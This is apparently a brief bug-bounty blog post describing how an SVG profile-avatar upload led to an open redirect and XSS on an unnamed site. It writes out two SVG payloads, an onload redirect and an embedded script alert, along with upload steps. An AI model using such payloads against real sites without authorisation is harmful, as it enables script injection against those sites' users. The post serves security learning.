Open redirect & rXSS via profile image

NoorHomaid
2 min readOct 27, 2023

--

Hello hackers,
In this article, I will demonstrate how I found an open redirect by uploading an SVG image as a profile avatar.

Let’s dive in.
For such a vulnerability, we would want to create an account on the target first. Then, we will go to the profile and see if we can upload an avatar to our profile. Note: check the target you are working on, and what avatar image extensions are allowed. Luckily, in my case, the target was allowing .svg images.

So I created a document image with the following code and saved it as (image.svg):
<?xml version=”1.0" encoding=”UTF-8" standalone=”yes”?>
<svg onload=”window.location=’https://google.com'"
xmlns=”http://www.w3.org/2000/svg">
<rect width=”300" height=”100" style=”fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)” />

</svg>

image.svg with embedded code

Head to the profile setting and upload the avatar (image.svg).
After successfully uploading the avatar, open it in a new window, and BOOM you will be directed to the location you specified in the code (in the above code I was redirected to Google).

open the avatar image to get the code executed

Cross-site scripting(XSS) via profile image

Now this can be also leveraged to execute rXSS by changing the code to the following:
<svg onload=alert(document.domain)>.svg
<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<rect width=”300" height=”100" style=”fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)” />
<script type=”text/javascript”>
alert(“XSS by noor”);
</script>
</svg>

The rest of the steps are the same as the open redirect. Once you open the avatar image the alert will pop up to you!

xss via svg profile image

I know this can be escalated to RCE and others, however, in my case, they did not work or maybe I did not have enough time to dig deeper into the target.

Happy hacking y’all

--

--

NoorHomaid
NoorHomaid

Written by NoorHomaid

BS in cybersecurity . PenTester . Web security researcher

Responses (3)